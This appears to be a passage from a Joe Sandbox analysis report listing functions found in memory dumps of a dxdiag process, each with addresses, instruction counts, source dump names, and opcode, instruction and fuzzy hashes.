Function 00409070 Relevance: 1.5, Strings: 1, Instructions: 256COMMON

Download Yara Rule

Strings

JR, xrefs: 00409089

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: JR
API String ID: 0-3458893224
Opcode ID: f7ae3770ed4749ad032964f2c81e60ade692c3c1a8750135e5cb492e043d9f21
Instruction ID: 44b59cc75133df7a41eb2e69763ada4243d618a4e2d430adff5262eca57ed642
Opcode Fuzzy Hash: f7ae3770ed4749ad032964f2c81e60ade692c3c1a8750135e5cb492e043d9f21
Instruction Fuzzy Hash: 0E61C52128C3C19AC3118F7994A07A7FFE09FA3314F1849BDE8D45B382D379891AD766

Function 0041CE00 Relevance: 1.5, Strings: 1, Instructions: 256COMMON

Download Yara Rule

Strings

~, xrefs: 0041CEC4

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: da1ad588922710a023164653a75339d34dbf593a205ea83d969eb3b9ccb4115d
Instruction ID: 6fa54e92a4b9978c13d68c63913922f98e05887ce952ffb0b0acc6151ef16d97
Opcode Fuzzy Hash: da1ad588922710a023164653a75339d34dbf593a205ea83d969eb3b9ccb4115d
Instruction Fuzzy Hash: 04811972A442614FC721CE28CC9139BBB919B85324F19827EECB99B3D2D638DC46D7D1

Function 00417D74 Relevance: 1.5, Strings: 1, Instructions: 215COMMON

Download Yara Rule

Strings

gfff, xrefs: 00417F4E

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: gfff
API String ID: 0-1553575800
Opcode ID: e937fccc05efa2ecf9c05215e5990dbb3af36eaf18178220cc255147cd05165b
Instruction ID: b635ffe6758fa563810d355454ed740eab1994e1762da840ca45afbcef432b43
Opcode Fuzzy Hash: e937fccc05efa2ecf9c05215e5990dbb3af36eaf18178220cc255147cd05165b
Instruction Fuzzy Hash: AF61D2B16083058BD354CF18C8417ABBBE6FBC9314F15892EE489D7392DB78D945CB8A

Function 0043A71E Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

W, xrefs: 0043A793

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-793274765
Opcode ID: 949d4f68b5a0f5e009217c52b19c5dd71c50b240281d9f5b5bf409637eb5aa83
Instruction ID: 1e5f2fd2993d5a5d00e1584304d987d2456e5e273d97887f4c8a7713582cd764
Opcode Fuzzy Hash: 949d4f68b5a0f5e009217c52b19c5dd71c50b240281d9f5b5bf409637eb5aa83
Instruction Fuzzy Hash: FE01D877B024018BC71CCF38C8A3565B7A3EB96215769627EC562DF3D9DE3498018648

Function 0040F116 Relevance: .7, Instructions: 745COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5e5b76ba52c3424cd9b7fcdc2f1a91986ccf407eca0dfc2878058712d65e054
Instruction ID: f3d5467b55631bdaa724751aa9045b56e4334b6402e67d183f6a87da8050b689
Opcode Fuzzy Hash: b5e5b76ba52c3424cd9b7fcdc2f1a91986ccf407eca0dfc2878058712d65e054
Instruction Fuzzy Hash: D152C471608B408FD364DF38C5953A7BBE1AB55314F18893ED8EB837C2E639A509C746

Function 00406670 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d126f66a0e66620eabdd7cd9048ccabb2a362495bcb1caefcf2ffaaa0a9a3f4a
Instruction ID: cba84eeb8f78e0ae709cb9e2e748fe6274e4b764df0cc893636221a17d4e6bb5
Opcode Fuzzy Hash: d126f66a0e66620eabdd7cd9048ccabb2a362495bcb1caefcf2ffaaa0a9a3f4a
Instruction Fuzzy Hash: 2452F1B0A08B849FE730DF24C4847A7BBE1AB51314F15883ED5E7167C2C37DA9958B1A

Function 0041EC80 Relevance: .7, Instructions: 658COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc4c0233347152bea9374f1e245860b134debedbd6707f992945391f7166038a
Instruction ID: 86af1cb4bafd0ed74008c60c32463ec180b14810afe3fc4f9a0b4589affe1339
Opcode Fuzzy Hash: cc4c0233347152bea9374f1e245860b134debedbd6707f992945391f7166038a
Instruction Fuzzy Hash: 476219B0508B819ED371CF3D8805786BFE5AB5A320F148A5EE4FAC7392D774A501CB66

Function 00402F50 Relevance: .7, Instructions: 657COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05d9facb0d4c79a7579644c66930578ddf1e6edfe5b96f5a7fc26d4a417109ca
Instruction ID: 1c54c97c46aa2ef6bdbd5d76da75d5e4d1013e71daecfc50a96a56d554505fa0
Opcode Fuzzy Hash: 05d9facb0d4c79a7579644c66930578ddf1e6edfe5b96f5a7fc26d4a417109ca
Instruction Fuzzy Hash: 6552F4715083459FCB14CF18C0806AABFE1BF89305F188A7EF8996B391D778E945CB89

Function 00407450 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e146d9e79c543f870ee6916604a8e8036e439f7ac644d997363382936f2289b5
Instruction ID: e3b42c420a0ab721274a946c9fa7eab4dab2f787d0bed5ea88cf2f50095341df
Opcode Fuzzy Hash: e146d9e79c543f870ee6916604a8e8036e439f7ac644d997363382936f2289b5
Instruction Fuzzy Hash: 5F22B332A087118BC725DE18D9806ABB3E1BFC4319F19893ED9C6A7385D738B8518B47

Function 00403950 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71b1cecae46f736fb81e8164bc74a66928acdad7a3bbb41b8c7e87c625e2b1db
Instruction ID: cb804480fa9771f3decfe968603f1fa251b047b45c1119fa1a0aece904f71b93
Opcode Fuzzy Hash: 71b1cecae46f736fb81e8164bc74a66928acdad7a3bbb41b8c7e87c625e2b1db
Instruction Fuzzy Hash: C8322470914B118FC328CF29C68052ABBF5BF85711B604A2ED697A7F90D73AF945CB18

Function 00411712 Relevance: .5, Instructions: 546COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f567d6d837b9d1cd09dbb14271fc336aa9119b96957633eaba47b69cb481c3c3
Instruction ID: 8de7fec0fbf75a066610e9e7739594f8429d2466b2c872ee27e4363637c8b379
Opcode Fuzzy Hash: f567d6d837b9d1cd09dbb14271fc336aa9119b96957633eaba47b69cb481c3c3
Instruction Fuzzy Hash: 9A22D3B5A08B408FD324DF38D4953ABBBE1AF55304F04893ED5EB87392E638A545CB46

Function 0043BA70 Relevance: .5, Instructions: 504COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75d62604bc8ba10a3965eda64e96c0529ca78dc7befd1f69851b412b056e6d36
Instruction ID: f274cfa4fd23e6236676cd1f27d37eda4d2c4e9f7f04722437533fa671a78e6f
Opcode Fuzzy Hash: 75d62604bc8ba10a3965eda64e96c0529ca78dc7befd1f69851b412b056e6d36
Instruction Fuzzy Hash: 03E11136718215CFCB08CF38D89126BB7E2EB8A314F1A857ED846D7391DB38D8058B85

Function 004362F0 Relevance: .5, Instructions: 482COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 25fc821ec4db295837e7241b6350ca118c1fd0113733dc9c373dc5578713d375
Instruction ID: 66bc5b333a0c6ee299b6e4738c483b6afcae0af6661c562ee48f541c7812e622
Opcode Fuzzy Hash: 25fc821ec4db295837e7241b6350ca118c1fd0113733dc9c373dc5578713d375
Instruction Fuzzy Hash: 71D14631608311ABD314DF24C88166FF7E1EB99718F15E92EE98593391D778DC05CB8A

Function 004082F0 Relevance: .4, Instructions: 429COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c961975c57f87857eab043c76c47428008017fdca8ad897df3e3d02d69e77613
Instruction ID: 193ede2baf899d4cd5aa5ba4271a00cee3d3de787d1d5f2eafa8c2ae60b57e67
Opcode Fuzzy Hash: c961975c57f87857eab043c76c47428008017fdca8ad897df3e3d02d69e77613
Instruction Fuzzy Hash: ADF12931A083525BC714CE29C99016BB7E3AFC5324F198A2EE4E5673D5DB38ED068B85

Function 00405980 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f22763de4bcdc26485400349c62461b958b278f38fe56ac1e4a402e23215dde
Instruction ID: 5cf728b11992c65e55bd4be9dc5e9eb5593f12857077bfd5cee5c93eadafeb55
Opcode Fuzzy Hash: 0f22763de4bcdc26485400349c62461b958b278f38fe56ac1e4a402e23215dde
Instruction Fuzzy Hash: 78E179711087418FD720DF29C880B6BBBE1EF99304F44882EE4D597791E779E948CB96

Function 0043D040 Relevance: .4, Instructions: 364COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5f5a32466b316229b481c2a5b140de938fb66be6b533df1eade2e4f47dd166c5
Instruction ID: 49bb995cc6258f3b287554f64d1e249e4e01c3de4c67095bf9184da5ae40cd93
Opcode Fuzzy Hash: 5f5a32466b316229b481c2a5b140de938fb66be6b533df1eade2e4f47dd166c5
Instruction Fuzzy Hash: 1BA13335A083118BC714DF29E88062BB7F2EF89310F09D56EE9918B395D779EC51CB86

Function 028FA4A4 Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000003.2303635403.00000000028EC000.00000004.00000020.00020000.00000000.sdmp, Offset: 028EC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_28ec000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac4e9764799106399ea0a55fe331406335f49f2f1bbb736c59c700d4d6934696
Instruction ID: eb8249cc96f67d2796b34d915014014d264193f4e19930284e9afe2aecd0bc03
Opcode Fuzzy Hash: ac4e9764799106399ea0a55fe331406335f49f2f1bbb736c59c700d4d6934696
Instruction Fuzzy Hash: 55B1105944E3C10FD75B8BB44D7A591BF70AE2712470E86CFC9CA8F4A3E349984AD362

Function 0041D0C0 Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afb16abf37928c5a7a5a34e99eaa9267622f6c5fd6ab5e95d3228bbac6b96ad5
Instruction ID: 7ac7e3b168bbb7afd94fe29f1e54d1f5c433d12e6b19e411e96f11bbc3239d1b
Opcode Fuzzy Hash: afb16abf37928c5a7a5a34e99eaa9267622f6c5fd6ab5e95d3228bbac6b96ad5
Instruction Fuzzy Hash: 88B104B5908201AFD7209F64CC42B5ABBE1FBD5314F144A3EFC98A32A0D735D855DB8A

Function 0043CCF0 Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1484557844803522bcb117125b195ac7485a0970c045e37efc9e321e46d71030
Instruction ID: ba8a09dc2418c02870105bc3f6dd75cfc533c2f59140fb6bc1d6151d28bd9c6f
Opcode Fuzzy Hash: 1484557844803522bcb117125b195ac7485a0970c045e37efc9e321e46d71030
Instruction Fuzzy Hash: CB910475A043019BD3189F29C89166BB7F2FFC9720F19A52EE895A7390D738EC41CB85

Function 004061E0 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 192b9d08ce17bc1d312091997c30b37e60dce660e4c0c653e6da0c20b7bf1f23
Instruction ID: 86fd598b9c61968874822396d4ab8b809d08d2c2737f86e898986d6ce750098e
Opcode Fuzzy Hash: 192b9d08ce17bc1d312091997c30b37e60dce660e4c0c653e6da0c20b7bf1f23
Instruction Fuzzy Hash: 7FC15BB29087418FC360CF28DC86BABB7E1BF85318F09492DD5DAD6242E778A155CB46

Function 00434463 Relevance: .3, Instructions: 293COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63f2497d7e62285dada7a2876494175f4b0e6dd28d60008838a8d86744dd0c73
Instruction ID: 6dc5e2ab74ae951aaa46e5139dd55047cfb70fd72833bef498b558f7cf56f5ea
Opcode Fuzzy Hash: 63f2497d7e62285dada7a2876494175f4b0e6dd28d60008838a8d86744dd0c73
Instruction Fuzzy Hash: 81D19A205087D18ED326CB3C8848B897FE15B6B324F0A83D9D4E65F3E3C3699946C766

Function 0041D4C0 Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 831baefd6db2069bebddcfca7b26fc92d614f56bb49a6b6e043571ad404f781f
Instruction ID: 20f5ed072c6bfbda0bc91a0cdde0de7c4fc080ad42862f5d594c9abb615ab40b
Opcode Fuzzy Hash: 831baefd6db2069bebddcfca7b26fc92d614f56bb49a6b6e043571ad404f781f
Instruction Fuzzy Hash: F6912832B59A804BD72C897C4C623AABA834BD6234F2CC77EE6B6873E5D96C48454345

Function 0042E480 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18cbb3298976ce66fbbf99e1a8bd522615c6d0d3dc0e3a5cc9d0c63d71211507
Instruction ID: 7a1eed898d1216762a2c7ff3d336fcba6ee216a9b47b043e4d7b41fbc61cb180
Opcode Fuzzy Hash: 18cbb3298976ce66fbbf99e1a8bd522615c6d0d3dc0e3a5cc9d0c63d71211507
Instruction Fuzzy Hash: 4E711726B59AF047D328853D6C223B67A824FD6334F6DC36EE5F28B3E1D56D88058349

Function 0040EE70 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93d4583822bfd4113c2639fd17e1e1593877d842793fc615dd777add114e4b86
Instruction ID: 3490b61dfd93ba184312fd33364581a50fe03d296d349fd53c95ac3e2b442cca
Opcode Fuzzy Hash: 93d4583822bfd4113c2639fd17e1e1593877d842793fc615dd777add114e4b86
Instruction Fuzzy Hash: 9C713A72714B008FD3249A3DC9823ABBBE2AB95314F18493ED5E7C33C6E63994168316

Function 00438A90 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5af0ea262aa505753d122ffbdef0684fedc436534fd759e33f9ed682c210788a
Instruction ID: c9e52aa4780a1a71b0f6536462f5c40a3ec639637a903cde8fa83514c66493a3
Opcode Fuzzy Hash: 5af0ea262aa505753d122ffbdef0684fedc436534fd759e33f9ed682c210788a
Instruction Fuzzy Hash: 33514C31A053118BD7209F2888C056FF792EFCA324F29A62EF59557361DB79EC0287D9

Function 00426A10 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4ffa1a60249f0232ffc83a46548397397e6d537db2bb810b08643fa12542080
Instruction ID: 5fccf0568e07a38315d86764f9ee9d51859a75a7ad21a5e232c3aae3b42cafbc
Opcode Fuzzy Hash: a4ffa1a60249f0232ffc83a46548397397e6d537db2bb810b08643fa12542080
Instruction Fuzzy Hash: 6651F6B2714B094BC708CE2CEC9123AB7D2ABD5204F99C63DE956C7381EF78E9158785

Function 0041CA48 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09487fa8393e4d5ced12145e9cb1f49e8312c96201f8f64dc6a060f30583d89a
Instruction ID: a491210344505289bb21a907e851a53a7042adf8aad5960711688d9cdac3ce5c
Opcode Fuzzy Hash: 09487fa8393e4d5ced12145e9cb1f49e8312c96201f8f64dc6a060f30583d89a
Instruction Fuzzy Hash: 0D51E1B1A4C3118BC324CF14C89266BB7B2EF96704F59855EE8856B384E335EA45C78A

Function 0041C802 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d7a100692903cc70a5f599463766be65404a136b4fb17078803adac557c427f
Instruction ID: 53513fe6c79870b6d8cfb68088b58b425f5e81915f7a899e94c8849bc048f5ff
Opcode Fuzzy Hash: 7d7a100692903cc70a5f599463766be65404a136b4fb17078803adac557c427f
Instruction Fuzzy Hash: CF51FFB525C3108BC718CF24C8916ABB7F2EFD6704F48995DE4858B3A0E339D901C74A

Function 0043B6F0 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd73a24cf2c1eeda96ee9a537b8945225a616c5a5e26b6f04eeaa05b60d36c92
Instruction ID: 8cf5b8e416399a360e4fa64b07ba8964707688b42fdc82ebe9d8400aceb4da68
Opcode Fuzzy Hash: cd73a24cf2c1eeda96ee9a537b8945225a616c5a5e26b6f04eeaa05b60d36c92
Instruction Fuzzy Hash: B8517A3BA18725CFDB04DF28E89025AB3A2FF8A351F1A847DDA8587242D734DD41CB85

Function 0041A9B0 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a33f91a27a4aeccfc9f3fb9721e5cd8899e2d19283775b4607b561721dd59f1b
Instruction ID: 8b22c1b07ae07e9e8c70e54b2664e987efbc7c12ed24ca91e0e63b8894becd6c
Opcode Fuzzy Hash: a33f91a27a4aeccfc9f3fb9721e5cd8899e2d19283775b4607b561721dd59f1b
Instruction Fuzzy Hash: EB41DF741093818BC720CF25C8616ABBBF1EF93364F044A5CE5C28B381E3B99945CB9B

Function 004022B0 Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f786a1eb69f8401f55855f4f3fd31df1bddefe192891aa7b36f300e25ebbc475
Instruction ID: 75762df367a30ba79ec702eae056234a675c2c7c4eda59630da6670717d7c4bd
Opcode Fuzzy Hash: f786a1eb69f8401f55855f4f3fd31df1bddefe192891aa7b36f300e25ebbc475
Instruction Fuzzy Hash: 40618EB08007419BD3109F28ED4970BBAA0FF4136DF14473DE8AA966F1D375D9A5CB8A

Function 00426282 Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 648467540263f3123b4c02ec5b4132445b1e857d55f0986aeedafcec0d1fb7a4
Instruction ID: c9803781c8c3e1c1503bbf2b7e0cb91ad599f48646208f78850af9b5bc693bbc
Opcode Fuzzy Hash: 648467540263f3123b4c02ec5b4132445b1e857d55f0986aeedafcec0d1fb7a4
Instruction Fuzzy Hash: DB5150B5A483408FD3209F65A88076FB7E4EBC6304F14493EF594A7281EBB8D5018B8B

Function 00434C70 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7da97045892d917d151bcc5c07033d7c408d372ec9e13f9ab9d0c550b62c297c
Instruction ID: a69caac395799761bf6e71e20599b88d1efc5e3bd1c132c25f0773fc5f0ec801
Opcode Fuzzy Hash: 7da97045892d917d151bcc5c07033d7c408d372ec9e13f9ab9d0c550b62c297c
Instruction Fuzzy Hash: 01516DB15087548FE714DF29D49435BBBE1BBC8318F044A2EE5E987350E379DA088F86

Function 004264F2 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79894954648a27af2fb2ffeb8b402e5cb964693089f0543b0c71abd2ccfebdb9
Instruction ID: 4eb4d543e274e6005dd5ac3d1296328a5cf021be0d14d03e83e5a7fc676d431e
Opcode Fuzzy Hash: 79894954648a27af2fb2ffeb8b402e5cb964693089f0543b0c71abd2ccfebdb9
Instruction Fuzzy Hash: 98515FB5A483508FD3209F65A88076FB7E4EBC6704F04493EF594A7390DBB8D9018B8B

Function 00433875 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ac499be7da668eacc6ab3733cda7f845be0ad4a5ad9f0ceb31502b03eb374089
Instruction ID: e982278c98a4a55a51dcc6fb07df31f24c4864dac0726d46ec862b3c15d8158c
Opcode Fuzzy Hash: ac499be7da668eacc6ab3733cda7f845be0ad4a5ad9f0ceb31502b03eb374089
Instruction Fuzzy Hash: A771E231A086918FC715CB3C885439EBFE16F5A324F19C799D4B99B3E2C7348946CB91

Function 0040E122 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b836058826120a22ad1171bfbe91918f388b7e8695f0bc64f326c4c29ef872e3
Instruction ID: 61c9cee79081f457ad2a062ba2558c50646c3fe9279bd5e78a79f88c837ed506
Opcode Fuzzy Hash: b836058826120a22ad1171bfbe91918f388b7e8695f0bc64f326c4c29ef872e3
Instruction Fuzzy Hash: 22518372751A018BC328CE39CC82567B6D3FBE5314728CA3D9196C76E5DA78E8118748

Function 00436980 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87c11cc2aa61918a5ec01a7bc7fdb27d64084d8cc58c4669a92926849c0a8f20
Instruction ID: 21dea60bbb219d656e905d7e418e96adc8bcbb3988d6d2a1a81a27e5a390af3f
Opcode Fuzzy Hash: 87c11cc2aa61918a5ec01a7bc7fdb27d64084d8cc58c4669a92926849c0a8f20
Instruction Fuzzy Hash: 62513B712087955FC724DA28C4912BBB7E2EFCA304F05CA1DE4DA8B385D239ED05D786

Function 0041A7A0 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
